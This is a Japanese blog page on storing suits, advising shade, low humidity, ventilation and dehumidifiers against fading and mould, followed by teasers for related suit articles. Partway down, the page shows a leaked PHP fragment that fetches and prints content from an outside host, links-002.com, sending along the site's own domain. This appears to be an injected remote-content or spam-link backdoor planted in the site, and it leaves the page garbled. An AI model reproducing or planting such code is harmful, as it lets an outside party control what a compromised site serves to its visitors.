banner

スーツは日陰の湿気の少ない場所で保管しましょう。

banner スーツを保管する時には直射日光は避けましょう。
以前虫除けになるかと思ってスーツを日向に掛けていたのですが、数日で日に焼けてしまいました。
しかも日が当たっている方が強く焼け、左右で色が違う状態になり、とても着られる状態ではなくなったので捨てました。
それ以来日に当たらない場所できちんと保管するようにしています。
日に当たらない場所でも、風通しの良い湿気の少ない場所にしましょう。
湿気の多い場所ですとカビが生えてしまいます。
カビが生えると繊維の奥まで進行するので、そうしたスーツも着られなくなるはずです。
カビの有る物を着るのは健康にも良くありませんし、日陰は日陰でも湿気の少ない場所を選ぶようにしてください。
なかなか難しい注文ではありますが、クローゼットの中に湿気取りなどを入れておくのでも対処できます。
桐などの湿気がたまりにくい素材でできているはずですし、扉を閉じると湿気取りはかなりの水を吸ってくれます。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

スーツ関連情報一覧

banner
スーツのボタンが取れたので自分で縫うと、変な風になってしまいました。
裁縫の技術が無い私には無

スーツのボタンをお店で付けてもらいました。

banner
最近スーツにスニーカーと言うスタイルに挑戦しています。
私の会社は服装にはうるさくないので、会

スーツにスニーカーを履くようになりました。

banner
男性なら、ほとんどの方がスーツを着た経験はあるでしょう。
特にビジネスマンならもちろんの事、冠

女性目線から見た男性のスーツ姿

Copyright(c) スーツ All Rights Reserved.